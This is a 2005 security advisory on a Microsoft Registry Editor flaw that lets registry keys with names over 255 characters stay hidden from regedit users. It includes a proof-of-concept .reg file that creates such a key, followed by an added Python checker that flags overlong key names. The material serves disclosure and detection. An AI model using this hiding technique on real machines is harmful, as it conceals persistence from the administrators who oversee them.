Microsoft Registry Editor long string key hiding
Wednesday, 31 August 2005
Summary
Microsoft Registry Editor is an advanced tool for viewing and changing settings in your system registry, which contains information about how your computer runs.
An overly long key name allows attackers to hide registry keys from users who rely on the Microsoft Registry Editor.
Credit:
The information has been provided by Andre Protas.
Details
Vulnerable Systems:
* Microsoft Registry Editor Windows 2000
* Microsoft Registry Editor Windows XP
* Microsoft Registry Editor Windows 2003 Server
A design flaw in Microsoft Registry Editor, which supports Unicode, allows attackers to place a long key name (longer than the size limit of 255) and thus hide the key from Microsoft Registry Editor users.
In order to exploit this issue, create an external .reg file and import it using regedit.exe:
Proof of Concept:
hiddenkey.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
123456789012345678901234567890123456789012345678901234567
890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012
3456789012345678901234567890123456789012345678901234567890
12345678901234567890123456]
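
A defensive check for the technique above, as an added example that is not part of the original advisory: it scans the text of a .reg file before import and reports every key-name component longer than the 255-character limit the advisory cites. The function names and the sample input are assumptions constructed for illustration.

```python
import re

MAX_KEY_NAME = 255  # key-name length limit cited in the advisory

# A key header line: [HIVE\sub\key], or [-HIVE\sub\key] for a deletion.
_HEADER = re.compile(r"^\[-?(.+)\]$")


def decode_reg(raw: bytes) -> str:
    """Decode .reg bytes. regedit exports "Version 5.00" files as UTF-16LE
    with a BOM; anything without that BOM is treated as ANSI here."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    return raw.decode("cp1252", errors="replace")


def find_long_key_names(reg_text: str, limit: int = MAX_KEY_NAME):
    """Return (line_no, component_length, parent_path) for every key-name
    component longer than `limit` characters."""
    findings = []
    for line_no, line in enumerate(reg_text.splitlines(), start=1):
        m = _HEADER.match(line.strip())
        if not m:
            continue  # value line, comment, blank line or file header
        parts = m.group(1).split("\\")
        for i, part in enumerate(parts):
            if len(part) > limit:
                findings.append((line_no, len(part), "\\".join(parts[:i])))
    return findings


# Constructed sample input (not from the advisory): one ordinary key and one
# key whose last component is 256 characters long.
SAMPLE = b"\xff\xfe" + (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example]\r\n"
    "\"Setting\"=\"1\"\r\n\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example\\" + "A" * 256 + "]\r\n"
).encode("utf-16-le")

if __name__ == "__main__":
    for line_no, length, parent in find_long_key_names(decode_reg(SAMPLE)):
        print(f"line {line_no}: {length}-char key name under {parent}")
```

The check assumes each key header sits on a single line, as regedit requires for import; a header that has been wrapped for display must be rejoined before scanning.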